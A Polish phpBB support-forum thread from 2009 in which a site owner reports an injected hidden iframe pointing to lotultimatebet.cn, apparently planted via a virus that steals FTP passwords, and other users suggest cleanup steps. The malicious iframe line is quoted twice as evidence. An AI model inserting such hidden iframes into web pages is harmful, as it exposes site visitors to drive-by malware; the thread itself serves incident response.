Exploit na forum, co robić

Pomoc przy instalacji oraz użytkowaniu phpBB 3.0.x. Forum nie służy do zgłaszania znalezionych błędów, innowacji lub problemów związanych ze stylami i modyfikacjami.
gracjan
Posty: 39
Rejestracja: 14 kwietnia 2009, 08:59

Exploit na forum, co robić

Post autor: gracjan » 14 kwietnia 2009, 09:02

Dziś rano po wejściu na forum zauważyłem problemy z grafiką, mega duże litery i nad logo pojawiły się takie rzeczy:

Kod: Zaznacz cały

[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3545: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3547: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3548: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3549: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)

Po wejściu na ftp i sprawdzeniu pliku index.php zauważyłem że na końcu kodu pojawiło się takie coś:

Kod: Zaznacz cały

<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>

Jak ładuje się strona to tak jakby ładowała się strona lotultimatebet.cn


Co robić??
Ostatnio zmieniony 15 kwietnia 2009, 08:55 przez gracjan, łącznie zmieniany 1 raz.

ania07
Posty: 216
Rejestracja: 05 stycznia 2009, 20:04
Kontakt:

Re: Forum jest chyba zhakowane, co robić

Post autor: ania07 » 14 kwietnia 2009, 09:30

Forum nie jest zhakowane, to jest wirus którego trzeba usunąć.

gracjan
Posty: 39
Rejestracja: 14 kwietnia 2009, 08:59

Re: Forum jest chyba zhakowane, co robić

Post autor: gracjan » 14 kwietnia 2009, 09:36

Właśnie pousuwałem

Kod: Zaznacz cały

<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>
z każdego pliku index.* i chyba pomogło, jeśli trzeba coś jeszcze zrobić to dajcie znać

ania07
Posty: 216
Rejestracja: 05 stycznia 2009, 20:04
Kontakt:

Re: Forum jest chyba zhakowane, co robić

Post autor: ania07 » 14 kwietnia 2009, 09:58

przeskanuj koniecznie system jakimś programem antywirusowym.

gracjan
Posty: 39
Rejestracja: 14 kwietnia 2009, 08:59

Re: Forum jest chyba zhakowane, co robić

Post autor: gracjan » 14 kwietnia 2009, 10:35

Przeskanowałem dyski NODem i nic nie wykazało

ania07
Posty: 216
Rejestracja: 05 stycznia 2009, 20:04
Kontakt:

Re: Forum jest chyba zhakowane, co robić

Post autor: ania07 » 14 kwietnia 2009, 11:33

No to gitarra :)

wiesieks
Zasłużony
Posty: 283
Rejestracja: 11 czerwca 2008, 06:27
Kontakt:

Re: Forum jest chyba zhakowane, co robić

Post autor: wiesieks » 14 kwietnia 2009, 12:53

Dodatkowo radzę pozmieniać hasło dostępu do ftp, skoro kod dostał się do index.php prawdopodobnie zostało ono złamane - no chyba , że samemu go niechcący dodałeś

Awatar użytkownika
daroPL
Zasłużony
Posty: 4564
Rejestracja: 24 czerwca 2005, 13:36
Lokalizacja: Poznań
Kontakt:

Re: Forum jest chyba zhakowane, co robić

Post autor: daroPL » 14 kwietnia 2009, 14:24

we3b już kiedyś o tego rodzaju problemie pisał. Jest to wirus, który „dokleja” się do klienta FTP. Kradnie hasła i dodaje czasami do plików jakiś tekst/reklamę.

jaroslw
Zasłużony
Posty: 4524
Rejestracja: 10 grudnia 2005, 18:48
Kontakt:

Re: Forum jest chyba zhakowane, co robić

Post autor: jaroslw » 14 kwietnia 2009, 16:22

we3b pisze:Złośliwy kod na forum
Ostatnimi czasy wiele witryn (w tym także forów phpBB) zostało dotknięte wirusem, który
dokleja własny kod do plików. Pierwsze wersje wirusa współpracowały wyłącznie z
programem Total Commander. Nowsze generacje działają już z większością popularnych
klientów FTP. Wirus podsłuchuje ruch w sieci oraz przechwytuje hasła do kont FTP.
Następnie loguje się na konta i dokleja własny kod JavaScript. Najczęściej ląduje on w plikach
index.*.

W wypadku zainfekowania systemu należy go przeskanować dobrym antywirusem, a
następnie przejrzeć pliki forum i porównać z tymi z oficjalnej paczki phpBB. Najlepszą
ochroną przed wirusem jest nie zapisywanie haseł w programach do obsługi połączeń FTP.
Pobierz styl: we_universalwe_clearblue
Nowości i aktualizacje: FacebookGoogle+Twitter

gracjan
Posty: 39
Rejestracja: 14 kwietnia 2009, 08:59

Re: Forum jest chyba zhakowane, co robić

Post autor: gracjan » 15 kwietnia 2009, 07:53

Kurde, pokasowałem te doklejone kody, po kilku godzinach znowu to samo :/ jak się mogę zabezpieczyć?? Pozmieniałem hasła, przeskanowałem kompa i nic, dalej to samo...

pit
Posty: 1580
Rejestracja: 25 lutego 2009, 18:15

Re: Exploit na forum, co robić

Post autor: pit » 15 kwietnia 2009, 11:20

Przeskanuj się czymś na "spyware/addware", wywal wszystko z documents and settings\gracjan\ustawienia lokalne\temp, i temporary internet files nie używaj IE.

jaroslw
Zasłużony
Posty: 4524
Rejestracja: 10 grudnia 2005, 18:48
Kontakt:

Re: Exploit na forum, co robić

Post autor: jaroslw » 15 kwietnia 2009, 15:00

Prawdopodobnie wirus dobrze się zamaskował. Mało informacji jest jeszcze na jego temat.

Z jakiego klienta FTP korzystasz?
Pobierz styl: we_universalwe_clearblue
Nowości i aktualizacje: FacebookGoogle+Twitter

matius71
Posty: 426
Rejestracja: 10 marca 2009, 14:16

Re: Exploit na forum, co robić

Post autor: matius71 » 15 kwietnia 2009, 20:58

najpierw usunąć wirka a potem zmienić hasło do ftp czy odwrotnie? Pytam bo jak sprytny wirek to jest chyba spora różnica?

jaroslw
Zasłużony
Posty: 4524
Rejestracja: 10 grudnia 2005, 18:48
Kontakt:

Re: Exploit na forum, co robić

Post autor: jaroslw » 15 kwietnia 2009, 21:14

Hasło i tak najprawdopodobniej zmieniasz przez panel administracji kontem hostingowym. Myślę, że tego już wirus nie przechwyci. Nie zapisuj nowego hasła w kliencie FTP do czasu usunięcia wirusa (na razie najlepiej w ogóle nie zapisuj w nim haseł ani loginów).
Pobierz styl: we_universalwe_clearblue
Nowości i aktualizacje: FacebookGoogle+Twitter

gracjan
Posty: 39
Rejestracja: 14 kwietnia 2009, 08:59

Re: Exploit na forum, co robić

Post autor: gracjan » 15 kwietnia 2009, 23:17

Korzystam z Total Commandera, pousuwałem to gówno z plików index na serwerze, zmieniłem hasło, ale niektórym znajomym nadal podaje że w chwili wejścia na strone/forum atakuje ich trojan :( na dole w pasku w chwili ładowania wyskakuje jeszcze nadal adres tamtej strony tak jakby się ładowało poprzez tamtą stronę, alias albo coś podobnego (nie znam się)

W każdym bądź razie po tych czynnościach forum działa bez zarzutów tylko niektórym pojawia się trojan i ładuje się poprzez tamtą stronę.

Jakby co to piszcie tu wasze problemy z tym badziewiem i wasze podpowiedzi co z tym robić...

Zablokowany

Wróć do „Użytkowanie”